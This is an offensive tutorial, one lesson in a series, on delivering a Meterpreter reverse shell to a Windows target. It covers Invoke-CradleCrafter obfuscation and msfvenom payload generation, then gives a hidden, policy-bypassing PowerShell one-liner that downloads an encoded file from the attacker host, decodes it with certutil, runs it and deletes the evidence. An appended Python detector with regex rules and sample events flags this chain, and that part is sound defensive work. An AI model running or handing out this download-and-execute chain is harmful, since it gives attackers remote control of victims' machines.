# Lesson 44: Supplement on the certutil one-liner payload download

Season 8 covered certutil's encode and decode functions.

```cmd
C:\>certutil -encode c:\downfile.vbs downfile.bat
```

Combined with PowerShell in-memory loading, certutil becomes considerably more powerful.

**Target machine: Windows 2012**

What is needed today is a PowerShell obfuscation framework to go with it:\
<https://github.com/danielbohannon/Invoke-CradleCrafter>

Usage:

```powershell
# Load the module, then launch its interactive menu
Import-Module ./Invoke-CradleCrafter.psd1
Invoke-CradleCrafter
```

![](/files/-LZJwsPpZUj5YNm9IAZ2)

![](/files/-LZJwsPrtqmvAVFp9Gsa)

If loading the PowerShell script produces the error **PowerShell requires a digital signature to run this script**, first run:

```powershell
Set-ExecutionPolicy Bypass
```

Generate the payload (payload generation will be covered in a later part of this series):

```bash
root@John:/tmp# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=53 -e cmd/powershell_base64 -f psh -o Micropoor.txt
```

![](/files/-LZJwsPtOwDDDWVo7tOP)

![](/files/-LZJwsPvg1dFvXKOe0Mv)

**Start Apache:**\
![](/files/-LZJwsPx039TRnJZH_0v)

**PowerShell framework settings:**

SET URL <http://192.168.1.5/Micropoor.txt>\
![](/files/-LZJwsPzE5Vq7jUAzJe9)

**MEMORY**\
![](/files/-LZJwsQ0hmogCGU_ZSFl)

**CERTUTIL**\
![](/files/-LZJwsQ2LN6YM_7uJ1J1)

**ALL**\
![](/files/-LZJwsQ4BqYFKQhF1bvD)

**1**\
![](/files/-LZJwsQ6snDobc5LO3Oj)

**Save the obfuscated content to a txt file, then encode it**\
![](/files/-LZJwsQ8yOlLQ60HeJ_g)

Place cer.cer and Micropoor.txt in the same directory.

**Run on the target machine:**

```cmd
powershell.exe -Win hiddeN -Exec ByPasS add-content -path %APPDATA%\cer.cer (New-Object Net.WebClient).DownloadString('http://192.168.1.5/cer.cer'); certutil -decode %APPDATA%\cer.cer %APPDATA%\stage.ps1 & start /b cmd /c powershell.exe -Exec Bypass -NoExit -File %APPDATA%\stage.ps1 & start /b cmd /c del %APPDATA%\cer.cer
```
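The one-liner above leaves a recognisable trace in process-creation telemetry: a hidden-window PowerShell with `-Exec Bypass` pulling content via `Net.WebClient`, followed by `certutil -decode` writing a `.ps1` under `%APPDATA%`. The following detector, an added example that is not part of the original lesson, runs three rules over constructed sample events shaped like Sysmon Event ID 1 / Security 4688 command-line records (the event tuples and rule names are assumptions, not real telemetry).

```python
import re

# Constructed sample process-creation events (not real logs):
# (parent image, image, command line).
SAMPLE_EVENTS = [
    ("cmd.exe", "certutil.exe",
     r"certutil -decode C:\Users\bob\AppData\Roaming\cer.cer C:\Users\bob\AppData\Roaming\stage.ps1"),
    ("cmd.exe", "powershell.exe",
     r"powershell.exe -Win hiddeN -Exec ByPasS add-content -path %APPDATA%\cer.cer "
     r"(New-Object Net.WebClient).DownloadString('http://192.168.1.5/cer.cer')"),
    ("explorer.exe", "certutil.exe",
     r"certutil -verify -urlfetch C:\certs\server.cer"),          # benign admin use
    ("services.exe", "powershell.exe",
     r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),   # benign scheduled script
]

# Each rule is (name, compiled regex over the command line). Matching is
# case-insensitive because the cradle mixes case ("hiddeN", "ByPasS") to evade
# naive string matches. PowerShell accepts unambiguous parameter prefixes, so
# "-Win" / "-Exec" are matched as "-w..." / "-e..." rather than the full names.
RULES = [
    # certutil -decode producing a script or executable: the stage.ps1 step above.
    ("certutil_decode_to_script",
     re.compile(r"certutil(\.exe)?\s+.*-decode\s+.*\.(ps1|exe|dll|bat|vbs)\b", re.I)),
    # certutil -decode writing into a user profile location such as %APPDATA%.
    ("certutil_userprofile_decode",
     re.compile(r"certutil(\.exe)?\s+.*-decode\s+.*(%APPDATA%|\\AppData\\)", re.I)),
    # Hidden window + execution-policy bypass + WebClient download in one command.
    ("powershell_hidden_bypass_download",
     re.compile(r"powershell(\.exe)?\s+(?=.*-w\w*\s+hidden)(?=.*-e\w*\s+bypass)"
                r".*(DownloadString|DownloadFile|Net\.WebClient)", re.I)),
]


def scan(events):
    """Return a list of (rule name, image, command line) for every rule hit."""
    hits = []
    for _parent, image, cmdline in events:
        for name, pattern in RULES:
            if pattern.search(cmdline):
                hits.append((name, image, cmdline))
    return hits


if __name__ == "__main__":
    for name, image, cmdline in scan(SAMPLE_EVENTS):
        print(f"[{name}] {image}: {cmdline}")
```

Only the two events that reproduce the lesson's chain fire; the benign certutil and PowerShell invocations do not.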

> Micropoor
